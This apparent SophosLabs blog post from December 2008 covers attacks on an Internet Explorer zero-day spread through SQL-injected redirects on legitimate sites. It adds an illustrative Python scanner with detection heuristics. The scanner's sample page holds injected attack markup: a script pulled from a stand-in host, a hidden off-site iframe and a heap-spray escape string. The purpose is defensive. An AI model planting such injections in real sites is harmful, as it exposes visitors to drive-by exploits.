All I want for Christmas… is a patch
As predicted last week, the volume of attacks looking to exploit the zero-day vulnerability in Internet Explorer (Microsoft Security Advisory 961051) is steadily growing. We are seeing many attacks where the bundle of exploits used to infect victims now includes content targeting this new vulnerability. (You can read our vulnerability assessment information here.)
And the topic is now clearly front page news. Literally. Earlier this morning I saw it mentioned on the front page of the BBC web site.
The tried and trusted technique of compromising legitimate web sites is being used to redirect victims to the malicious attack sites. Once again, SQL injection appears to have been used to hit those sites (also reported by ISC): the injected markup lands in database fields that the site renders into its own pages, so visitors are redirected without the site's owners changing a single file. Safe browsing habits alone are therefore not sufficient to avoid exposure to the malicious code; a trusted site can serve the redirect.
Microsoft blogged about porn sites being used to infect victims. Whether these sites were compromised or merely set up to lure victims is not clear, though that is largely irrelevant to the victim.
So what can users do? One option is to decipher the workarounds posted by Microsoft in their advisory. Mmm, definitely not trivial. Some more details on the workarounds are available from a recent posting on the TechNet site, but this is no simple option (there is no nice “killbit solution” for this one).
Whatever their browser choice, users must ensure they have up to date, effective security in place to defend them against today’s threats. Quality generic detections are proven to be effective against new malware, and URL filtering can add a significant layer of protection against web-borne threats.
For Sophos customers, protection is provided at a series of levels.
- Detection of the redirects injected into compromised sites: Mal/Badsrc-C, Mal/Iframe-F.
- Detection of the redirects used within the attack sites: Troj/Iframe-* (various), Mal/Iframe-G.
- Detection of the script components used to exploit this vulnerability: Exp/Datbi-A, Troj/JSShell-E, Mal/JSShell-B.
- Prevention of the buffer overflow delivering its payload: BOPS (buffer overflow protection).
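The first three layers above all key on markup and script that an attacker has planted in a page: a `<script src>` pulling from a host the site never used, a zero-size or `display:none` iframe pointing off-site, and inline scripts that build their payload from long `%uXXXX` escape runs. The scanner below, an added illustration and not SophosLabs code or any of the detections named above, runs those three heuristics over rendered HTML. Because it inspects the page as served, it catches content injected through SQL injection into a database field just as well as content edited into a file. The allow-list of trusted hosts, the thresholds and both sample pages are constructed here for the example.

```python
"""Scan rendered HTML for injected redirect content: a foreign <script src>,
a hidden or off-site <iframe>, or an inline script with a long %uXXXX run.
Added example, not SophosLabs code; hosts, thresholds and pages are made up."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this hypothetical site legitimately loads content from (assumption).
TRUSTED_HOSTS = {"www.example-shop.com", "static.example-shop.com"}

# Four or more consecutive %uXXXX escapes: the unescape() idiom used to build
# shellcode or heap-spray strings in browser exploit scripts.
UNICODE_RUN = re.compile(r"(?:%u[0-9a-fA-F]{4}){4,}")


def _is_foreign(src, trusted):
    """True if src names a host outside the allow-list (relative URLs pass)."""
    if not src:
        return False
    host = urlparse(src.strip()).netloc.lower().split(":")[0]
    return bool(host) and host not in trusted


def _is_hidden(attrs):
    """True for the zero-size or display:none iframes used to load attack pages."""
    style = (attrs.get("style") or "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    for dim in ("width", "height"):
        m = re.match(r"\d+", (attrs.get(dim) or "").strip())
        if m and int(m.group()) <= 2:  # 2px threshold is an assumption
            return True
    return False


class RedirectScanner(HTMLParser):
    def __init__(self, trusted):
        super().__init__()
        self.trusted = trusted
        self.findings = []          # (element, src, reasons) in document order
        self._script_body = None    # collects inline script text until </script>

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            checks = (("hidden", _is_hidden(a)),
                      ("foreign-host", _is_foreign(a.get("src"), self.trusted)))
            reasons = [name for name, hit in checks if hit]
            if reasons:
                self.findings.append(("iframe", a.get("src"), ",".join(reasons)))
        elif tag == "script":
            if _is_foreign(a.get("src"), self.trusted):
                self.findings.append(("script", a["src"], "foreign-host"))
            self._script_body = []

    def handle_data(self, data):
        if self._script_body is not None:
            self._script_body.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script_body is not None:
            body = "".join(self._script_body)
            self._script_body = None
            if UNICODE_RUN.search(body):
                self.findings.append(("script-inline", None, "unicode-escape-run"))


def scan_html(html, trusted=TRUSTED_HOSTS):
    """Return the list of suspicious elements found in a rendered page."""
    parser = RedirectScanner(trusted)
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample pages. The injected one mimics a product description that
# was appended to via SQL injection: the stray </title> and unquoted script tag
# are typical of payloads written blindly into a text column.
CLEAN_PAGE = """<html><head><title>Shop</title>
<script src="https://static.example-shop.com/site.js"></script></head>
<body><iframe src="/help/faq.html" width="600" height="400"></iframe></body></html>"""

INJECTED_PAGE = """<html><head><title>Shop</title></head><body>
<h1>Product: Widget</h1>
<p>Great widget</title><script src=http://203.0.113.7/ngg.js></script></p>
<iframe src="http://malicious.invalid/in.php" width=0 height=0 style="display:none"></iframe>
<script>var s=unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c");document.write(s);</script>
</body></html>"""

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        print(name, scan_html(page))
```

The allow-list is what makes the first two checks useful: a site that knows which hosts it loads scripts and frames from can treat anything else as a finding, whereas a generic "is this iframe hidden" rule alone would still miss a visible off-site frame. Relative URLs are deliberately passed, since they are served by the site itself; an attacker who can also write files to the web root is a different problem from the database-field injection described above.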

Additionally, the data intelligence we are gathering on these attacks is being used to blacklist the malicious URLs being used, to boost protection for customers using the web appliance.
It will be interesting to see how quickly Microsoft can make a patch available for this one. With the Christmas and New Year period looming, even if a patch is made available out of the regular monthly cycle, many organisations will be unable to deploy it immediately anyway.
And for all those little netbooks wrapped up and awaiting opening, take care to ensure they are properly secured prior to getting online and sending festive e-cards…
Posted on December 16th, 2008 by Fraser Howard, SophosLabs UK. Filed under: General